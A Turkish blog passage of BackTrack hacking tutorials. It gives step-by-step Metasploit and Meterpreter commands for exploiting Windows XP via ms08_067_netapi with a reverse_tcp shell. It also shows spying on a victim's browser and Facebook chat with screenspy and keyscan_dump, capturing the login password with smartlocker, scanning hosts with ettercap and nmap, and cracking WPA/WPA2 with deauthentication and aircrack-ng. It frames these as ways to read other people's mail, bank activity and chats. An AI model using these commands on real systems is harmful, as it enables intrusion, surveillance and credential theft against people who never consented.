Facebook Chat takibi
Bu Backtrack eğitiminde exploit edilmiş bir sistem üzerindeki internet tarayıcısı üzerinden kişinin bağlı bulunduğu facebook chat'ine sızmayı göstereceğim.
Buradaki Backtrack eğitiminde bir sistemin nasıl exploit edileceğini göstermiştim şimdi aynı exploiti kullandığımızı var sayarak bir kaç adım geriye gidiyoruz.
***Sistemi Exploit ettik***
Buraya kadarki kısım önceki backtrack makalesinde yer alıyordu şimdi buradan sonra farklı bir yol izleyip kişinin facebook chatine sızacağız.
Screenspy'ımızı çalıştırıyoruz , eğer screenspy'ın başka hangi modlarda çalıştığını görmek istiyorsanız "run screenspy -h" komutunu girmeniz gerekli. Biz screen spyımızı 1 sn gecikme süresi ile birlikte 60sn boyunca çalıştıracağız bunun içinde
"run screenspy -d 1 -t 60" komutunu kullanıyoruz. -d = delay , -t = time
» Bu yöntem özellikle facebook chati görüntülemek değil kişinin o an internet tarayıcısında ne yaptığını görüntülemek içindir , ben sadece olası bir seneryo yarattım.
» Aynı şeyi internet tarayıcısı yerine lotus notes'a yaparsanız kişinin şirket maillerini okumanızı sağlar yada o sırada banka hesabında işlem yapıyorsa ve takviminden nereye gideceğini yazıyorsa onlarada erişebilirsiniz , hedef programı seçmek size kalmış
***backtrack üzerinde screenspyı çalıştırdık*** Önceki yazıda bahsettiğim "ps" komutuyla yine çalışan programları görüntülüyoruz.
***PS çıktısı***
Firefox'u migrate edeceğiz.Komutumuz "migrate process id" şeklinde firefox'un process idsi 2220 olduğu için "migrate 2220" yazıyoruz backtrack'e. Eğer siz opera'yı izleyecek olsaydınız onun process idsini girmeniz gerekmekteydi.
***Firefox migration***
***Keyscan biraz zaman alacak***
keyscan bittikten sonra "keyscan_dump" komutuyla kişinin o an ne yaptığını görüntüleyebiliyoruz.
Backtrackte konrolu ele alma , ettercap:nmap:metasploit
Backtrack Araçları: Metasploit adlı başlığımda bir exploiti kullanmanın nasıl bir şey olduğunu anlatmıştım şimdi burada biraz daha ayrıntılı kısmını göstereceğim. Önce vulnerable bir sistem bulmamız gerekli bunun için bu backtrack eğitiminde ettercap adında bir yazılım kullancağız. Ettercap backtrack'in barındırdığı bir ağ dinleme yazılımıdır. MITM (man in the middle) saldırıları dahil bir sürü özelliğe sahiptir. Konsola "ettercap -h" yazdığımda kullanımı ile ilgili bir çıktı alacaksınız. -h komutunu backtrackteki tüm araçlar için kullanabilirsiniz size hatırı sayılır bilgiler verecektir.
Biz bu yazıda ettercap'in gtk arayüzünü kullancağımızdan -G komutunu veriyoruz. Şimdi ettercap'i kullanarak hedef olacak bilgisayarların ip adreslerini görelim.
***ettercap gtk arayüzü***
şimdi ettercap'in sniff sekmesinden unified sniff 'i seçiyoruz. Sıradaki aşama çok önemli çünkü tarayacağımız alanı belirliyecek. wlan0 wirelesslar için eth0 kablolu bağlantılar için hatta vmware üzerine kurulu bir sisteme erişim için ki ben anlatımımda öyle yapacağım vmnet1 i kullanacağım.
***Ettercap taraması sonuçları***
"Hosts" sekmesine girip "scan for hosts" a tıklıyoruz ve bize çevremizdeki seçtiğimiz network tipine göre bağlanabileceğimiz makineleri gösteriyor , dikkat edilmesi gereken bir durum var burada ip ve mac adresleriyle birlikte listelenen bilgisayarlar vulnerabledır diyemeyiz çünkü , daha onlar hakkında bir bilgimiz yok sadece internete bizim seçtiğimiz network tipine göre bağlı olduğunu bilmekteyiz.
Şimdi ettercap çıktısına göre bir bilgisayarı seçiyoruz. Ben 192.168.0.128 ip adresli bilgisayarı kullanacağım. Sıradaki işlem bu ipli bilgisayar hakkında bilgi edinme. Hangi işletim sistemini kullanıyor? , Hangi portları açık? bu soruların cevaplarına göre uygun exploiti seçeceğiz.
Bunun için backtrackteki nmap adındaki bir araçtan yararlanacağız.Eğer elinizde farklı bir işletim sistemi varsa onun üzerine nmap yükleyip aynı şekilde kullanabilirsiniz bildiğim kadarıyla tüm unix,linux ve maclerde çalışmakta. Nmap , adındanda anlaşılabileceği gibi bir network mapperdır yani bir ağın haritasını çıkarır. Nmap ile ağdaki hostları belirleyebilir, kullandıkları işletim sistemlerini bulabilir , çalışan servisleri ve açık portları görüntüleyebiliriz. Kullanımı için "nmap -h" komutunu kullanabilirsiniz.Bu backtrack eğitiminde nmap -O seçeneğini kullanacağız bize portları ve işletim sistemi hakkındaki özellikleri gösterecek.
****nmap -O ip adresi şeklinde kullanılır***
Gördüğünüz gibi hedef sistem Windows xp sp2 yada sp3 kullanıyor biz şimdi o sisteme etki eden bir exploit kullanacağız. Şimdi daha önceki backtrack eğitiminde anlattığım gibi metasploiti açıyoruz.
cd /pentest/exploits/framework3/ ./msfconsole
Metasploiti her açtığınızda "svn update" (günlük yapmanız yeterlidir) komutunu kullanmanızı öneririm bu makalede belirli bir exploit kullancağız fakat bu komut sayesinde yeni gelen exploitleride metasploit konsolunda görebilirsiniz.
Bu saldırı için kendi ip adresinizide bilmeniz gerekiyor exploitimiz böyle çalışıyor exploiti yükleyince " show options" ilede gereklilikleri görüntüleyebilirsiniz şimdi yeni bir konsolda ip adresinizi bilmiyorsanız "ifconfig" komutuyla görüntüleyebilirsiniz.
Bu saldırıda 445 nolu porttan sisteme giriş yapacağız. Kullanacağımız exploit ise ms08_067_netapi use windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
komutlarını vererek exploit ve payloadımızı yüklüyoruz.
***exploiti ve payloadı yükledikten sonra show options komutuyla gereken şeyleri görüntüleyebiliriz*** eğer show optionsu kullandıysanız RHOST ve LHOSTU ayarlamamız gerektiğini görmüşsünüzdür.Ben yinede resmini vereyim.
gördüğünüz gibi RHOST un yanında gerekliliğin altında yes yazıyor buda demek oluyor ki saldıracağınız kişinin ip adresinize ihtiyacınız var aynı zamanda altındaki RPORTta ise 445 nolu portu kullanmalısınız diyor ,
payloadımızdada aynı şeyleri görebilirsiniz LHOST u ayarlamamız gerektiği gibi.... Şimdi bunları halledelim.
***RHOST ve LHOST 'u ayarladık*** Şimdi sıra geldi çalıştırmaya "exploit" diyerek kullanıyoruz.
exploitimiz yaptığı şeyleri bize adım adım gösteriyor :) şimdi bilgisayarı payloadımızın el verdiğince
kullanabileceğimiz bir alan haline geldi. Amacımız kişinin giriş şifresini öğrenmek olsun. Sistemi exploit ettikten sonra meterpreter shelle geçti gördüğünüz gibi.
şimdi "ps" komutuyla bir nevi kişinin bilgisayarında ctrl+alt+del yapıyoruz ama biraz daha detaylı.
***ps komutu çıktısı***
Şimdi meterpretera "migrate 672" komutunu veriyoruz ardından smartlocker adlı scriptimizi çalıştırıyoruz.
***smart locker help çıktısı***
***Gördüğünüz gibi şifreyi kaydetti*** Smartlocker'ın gösterdiği klasöre giderek şifreye erişebiliriz.
not:ettercap backtrack 5 te düzgün çalışmıyor en kısa sürede backtrack takımının düzelteceğine eminim.
Başlangıçta Metasploit üzerinde durmam backtrackin wirelesstaki ününü duyupta gelenlerin canını sıkabilir fakat metasploit güvenlik testlerinin backtrack için en önemli unsurlarından biridir. Metasploit sayesinde bir sistemi tamamen ele geçirebilir onunla istediğinizi yapabilirsiniz , sürekli gelişen exploit arşivini hesaba katarsakta metasploiti verebileceği zarar yüzünden ön planda tutuyorum , wireless kısmınada geleceğim.
Backtrackte metasploiti açmak için;
» Applications/Backtrack/Exploitation Tools/Network Exploitation Tools/Metasploit Framework/msfconsole » Konsolda , cd /pentest/exploits/framework3/ sonra ./msfconsole yazabilirsiniz.
ikincisi bir süre alıştıktan sonra size daha rahat gelecektir.
***msfconsole komut listesi***
Gördüğünüz gibi backtrackimizin msfconsole'una "?" komutunu verdiğimizde metasploitin temel komutlarını görüntülemektesiniz , çoğu zaman bunlar hayat kurtarıcı olacak...
basit birkaç komutla metasploite giriş yapalım
exploit databaseini update etmek için konsola ; svn update yazmanız gerekli eğer update varsa aşağıdaki gibi birşeyle karşılaşıcaksınız.
Metasploitte tüm scriptler belirli bir düzen içerisindedir. Daha önce bahsettiğim "ls" (listelemek için) "cd" komutlarını kullanarak konsoldan gezebilirsiniz yada Places kısmından pentest klasörüne girerek tüm scriptlerin belirli bir düzen içerisinde olduğunu görebilirsiniz. Bu sadece backtrack için geçerli değil tüm metasploit kullanan linuxler için geçerlidir.(windowsta denemediğimden bilmiyorum)
Exploit arama
az önce "?" komutu ile basit komutları göstermiştim onlardan biride "search" komutu bu komut sayesinde benim saldıracağım bir hedef varsa örneğin; vulnerable bir windows os benim metasploitteki aramam şu şekilde olmalı msf> search windows
listelenen exploitlerin yanında Rankları ve çıkış tarihleri yazmaktadır. Kullanılan exploit ne kadar yeniyse hedef olan sistemin o açığı kapatma olasılığı o kadar düşüktür. Ayrıca Rank kısmıda denemelere göre bir
derecelendirmedir , rankı ne kadar yüksekse o kadar iyi sonuç vermektedir. Description kısmındansa exploitin nereye saldırdığını görebiliriz.
exploiti "use exploit adı" şeklinde kullanıyoruz.
exploitin özelliklerini ise "show options" diyerek görebiliriz. bir sonraki yazımda backtrackte windows şifresini görüntülemek için bir exploit kullanacağım.
Wpa/wpa2 Şifresi kırma
wpa ev kullanıcılarının en çok kullandığı şifreleme yöntemidir ve wep şifrelerinden çok daha zor kırılır. öncelikle
"airmon-ng start wlan0" komutunu veriyoruz.
karşımıza gelmesi gereken ekran
Paket toplama işlemi
Bu aşamadan sonra şifresi kırılıcak olan ağın bazı şeylerini not etmeniz gerekiyor.
not etmeniz gerekenler
"airodump-ng --channel 11 --write output --bssid 00:1C:A8:91:42:22 mon0"
karşımıza gelmesi gereken ekran ( şeçilen ağla ilgili paket toplama işlemi)
Bu işlem devam ederken wpa şifre kırmasını kolaylaştırmak için hedef ağa bir saldırıda daha bulunacağız. shift + ctrl + T ye basarak yeni bir konsol açın ve
"aireplay-ng --deauth 1 -a 00:1C:A8:91:42:22 -c 00:13:02:0D:5D:89 mon0" komutu girin.
sonunda mon0 olucak!
bu işlemden sonra ilk pencerede handshake yakalamış olmanız gerekli.
Handshake
şimdi "aircrack-ng output-01.cap -w /pentest/passwords/wordlists/wpa.txt" bu komutu kullanarak aircrack'e wpa şifresini kırdırabilirsiniz. Benim wordlistim /pentest/passwords/wordlists/wpa.txt olduğu için ben öyle belirttim sizinki nerde ise siz orayı belirtmelisiniz.
Posted in: wpa, wpa şifre kırma, wpa2, wpa2 şifre kırma
#Paylaş!:- BlinkList + Blogmarks + Digg + Del.icio.us + Ekstreme Socializer + Feedmarker + Furl + Google Bookmarks + ma.gnolia + Netvouz + RawSugar + Reddit + Scuttle + Shadows + Simpy + Spurl + Technorati + Unalog + Wink Wep şifresi kırma
06:22 / Comments (0) / by Sinan
Backtrack linux'ün ünlenme sebeplerinin başında gelen wireless şifre kırmadır. Fakat günümüzde pek wep şifresi kalmadığı için bunu birinin blogunda bulduğum video ile geçmek istiyorum.Videoda herşey detaylı bir şekilde açıklanmış yinede wep şifre kırma ile ilgili sorularınız olursa yorum kısmından sorabilirsiniz.
» backtrackte wireless şifresi kırarken internetinizin olması gerekmez.
» şifre kırmak için world lise ihtiyacınız var , backtrack 5'in içinde geliyor fakat bu demek değil ki ben her wireless'a girebilirim.
World listler sözlük gibidir içlerinde çok sayıda sözcük bulundururlar ve bizim burada yaptığımız saldırı o sözcükleri modem şifresi olarak denemektir. Bu yüzden sözcükler yaşadığınız yere göre farklılık gösterecektir yani backtrackin ingilizce hazırladığı wordlist Türkiye'deki kişilerin adsl şifrelerinin türkçe sözcükler içereceğini düşünürsek daha az kullanışlı olacaktır.
